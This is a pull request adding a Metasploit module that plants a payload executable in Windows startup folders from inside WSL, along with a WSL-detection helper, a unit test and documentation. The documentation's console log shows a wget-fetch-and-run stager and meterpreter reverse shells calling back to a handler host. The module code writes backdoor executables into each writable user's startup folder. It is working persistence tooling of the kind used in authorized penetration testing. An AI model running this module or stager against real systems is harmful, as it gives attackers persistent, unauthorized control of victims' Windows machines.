### PR TITLE
wsl startup folder persistence

### DIFF
--- a/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
+++ b/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
@@ -7,14 +7,10 @@ Verified on Windows 10 with Ubuntu 24.04 WSL distribution.
 
 ## Verification Steps
 
-1. Exploit a box that uses APT
-2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
-3. `use exploit/linux/persistence/apt_package_manager`
-4. `set SESSION <id>`
-5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
-6. `exploit`
-
-When the system runs `apt-get update` the payload will launch.
+1. Get a shell on WSL (wsl could be started in a user or admin context)
+2. `use exploit/linux/persistence/wsl/startup_folder`
+3. `set SESSION <id>`
+4. `exploit`
 
 ## Options
 

--- a/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
+++ b/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
@@ -1,0 +1,129 @@
+## Vulnerable Application
+
+This module establishes persistence by creating a payload in the windows startup folder from within
+the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login.
+
+Verified on Windows 10 with Ubuntu 24.04 WSL distribution.
+
+## Verification Steps
+
+1. Exploit a box that uses APT
+2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
+3. `use exploit/linux/persistence/apt_package_manager`
+4. `set SESSION <id>`
+5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+6. `exploit`
+
+When the system runs `apt-get update` the payload will launch.
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of backdoor executable. Defaults to a random name
+
+### CONTEXT
+
+Target each User or All Users (system). Defaults to `USER`. Choices are `USER`, `SYSTEM`.
+
+## Scenarios
+
+### Tested on Windows 10 with Ubuntu 22.04 WSL
+
+Initial access into WSL
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4446 
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown
+msf exploit(multi/script/web_delivery) > 
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : win10prolicensed.localdomain
+OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/wsl/startup_folder) > set session 1
+session => 1
+msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(linux/persistence/wsl/startup_folder) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(linux/persistence/wsl/startup_folder) > [!] SESSION may not be compatible with this module:
+[!]  * incompatible session platform: linux. This module works with: Windows.
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Inside WSL environment
+[+] The target appears to be vulnerable. Likely exploitable
+[+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc
+```
+
+Logout and back in to windows
+
+```
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+
+msf exploit(linux/persistence/wsl/startup_folder) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500
+
+msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > background
+```

--- a/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
+++ b/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
@@ -22,6 +22,10 @@ Name of backdoor executable. Defaults to a random name
 
 Target each User or All Users (system). Defaults to `USER`. Choices are `USER`, `SYSTEM`.
 
+### USER
+
+Only required when `CONTEXT` is set to `USER`. The user to exploit, or `ALL` for all of them. Defaults to `ALL`.
+
 ## Scenarios
 
 ### Tested on Windows 10 with Ubuntu 22.04 WSL

--- a/lib/msf/core/post/linux/wsl.rb
+++ b/lib/msf/core/post/linux/wsl.rb
@@ -1,0 +1,17 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Post
+    module Linux
+      module Wsl
+        include ::Msf::Post::Linux::Kernel
+        #
+        # Returns a boolean if the kernel includes WSL indicators
+        #
+        def wsl?
+          kernel_release.include?('-Microsoft')
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/post/linux/wsl.rb
+++ b/lib/msf/core/post/linux/wsl.rb
@@ -9,7 +9,7 @@ module Msf
         # Returns a boolean if the kernel includes WSL indicators
         #
         def wsl?
-          kernel_release.include?('-Microsoft')
+          kernel_release.downcase.include?('-microsoft')
         end
       end
     end

--- a/modules/exploits/linux/persistence/wsl/startup_folder.rb
+++ b/modules/exploits/linux/persistence/wsl/startup_folder.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  include Msf::Post::Linux::Wsl
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux WSL via Startup Folder Persistence',
+        'Description' => %q{
+          This module establishes persistence by creating a payload in the windows startup folder from within
+          the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login.
+
+          Verified on Windows 10 with Ubuntu 24.04 WSL distribution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'h00die' ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
+        ],
+        'DisclosureDate' => '2016-08-02', # WSL release date
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+        OptEnum.new('CONTEXT', [false, 'Target each User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])
+      ]
+    )
+  end
+
+  def exploitable_folders
+    can_do = []
+    if datastore['CONTEXT'] == 'USER'
+      root = '/mnt/c/Users'
+      tail = '/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup'
+      user_folders = dir(root)
+      user_folders.each do |f|
+        next if f =~ /Public$/i
+        next if f =~ /Default$/i
+        next if f =~ /Default User$/i
+        next if f =~ /All Users$/i
+        next if f =~ /desktop.ini$/i
+
+        folder = File.join(root, f, tail)
+        can_do << folder if directory?(folder) && writable?(folder)
+      end
+      return can_do
+    end
+    root = '/mnt/c/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup'
+    can_do << root if directory?(root) && writable?(root)
+    can_do
+  end
+
+  def check
+    return CheckCode::Safe('Target is not WSL') unless wsl?
+
+    vprint_good('Inside WSL environment')
+
+    return CheckCode::Safe('No writable startup folders found') if exploitable_folders.empty?
+
+    CheckCode::Appears('Likely exploitable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_name << '.exe' unless payload_name.downcase.end_with?('.exe')
+    payload_exe = generate_payload_exe
+    exploitable_folders.each do |folder|
+      f = File.join(folder, payload_name)
+      write_file(f, payload_exe)
+      vprint_good("Writing payload to #{f}")
+      @clean_up_rc << "rm \"#{f.gsub('\\', '/')}\"\n"
+    end
+  end
+end

--- a/modules/exploits/linux/persistence/wsl/startup_folder.rb
+++ b/modules/exploits/linux/persistence/wsl/startup_folder.rb
@@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Local
     register_options(
       [
         OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
-        OptEnum.new('CONTEXT', [false, 'Target each User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])
+        OptEnum.new('CONTEXT', [false, 'Target each User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ]),
+        OptString.new('USER', [false, 'The user to target, or ALL for all users.', 'ALL'], conditions: ['CONTEXT', '==', 'USER'])
       ]
     )
   end
@@ -64,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Local
         next if f =~ /Default User$/i
         next if f =~ /All Users$/i
         next if f =~ /desktop.ini$/i
+        next unless (f.upcase == datastore['USER'].upcase) || (datastore['USER'] == 'ALL')
 
         folder = File.join(root, f, tail)
         can_do << folder if directory?(folder) && writable?(folder)

--- a/modules/exploits/linux/persistence/wsl/startup_folder.rb
+++ b/modules/exploits/linux/persistence/wsl/startup_folder.rb
@@ -95,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Local
       f = File.join(folder, payload_name)
       write_file(f, payload_exe)
       vprint_good("Writing payload to #{f}")
-      @clean_up_rc << "rm \"#{f.gsub('\\', '/')}\"\n"
+      windows_path = f.sub(%r{^/mnt/([a-z])}) { "#{::Regexp.last_match(1).upcase}:" }.gsub('/', '\\')
+      @clean_up_rc << "rm \"#{windows_path}\"\n"
     end
   end
 end

--- a/modules/exploits/linux/persistence/wsl/startup_folder.rb
+++ b/modules/exploits/linux/persistence/wsl/startup_folder.rb
@@ -32,6 +32,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DefaultTarget' => 0,
         'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
         ],
         'DisclosureDate' => '2016-08-02', # WSL release date

--- a/spec/lib/msf/core/post/linux/wsl_spec.rb
+++ b/spec/lib/msf/core/post/linux/wsl_spec.rb
@@ -1,0 +1,35 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Post::Linux::Wsl do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  describe '#wsl?' do
+    let(:expected_command) { 'uname -r' }
+
+    context 'when the kernel includes Microsoft' do
+      it 'returns true' do
+        expect(subject).to receive(:cmd_exec)
+          .with(expected_command)
+          .and_return("4.4.0-18362-Microsoft\n") # Ubuntu 24.04 on Windows 10 as of Dec 28 2025
+
+        result = subject.wsl?
+        expect(result).to be true
+      end
+    end
+
+    context 'when the kernel doesn\'t includes Microsoft' do
+      it 'returns false' do
+        expect(subject).to receive(:cmd_exec)
+          .with(expected_command)
+          .and_return("6.17.10+kali-amd64\n")
+
+        result = subject.wsl?
+        expect(result).to be false
+      end
+    end
+  end
+end


### PR DESCRIPTION
This adds a new persistence for getting from WSL back into the windows host by writing to the user's startup folder. This makes a complete cycle with #20701

Also starts a library for WSL things

## Verification

see docs
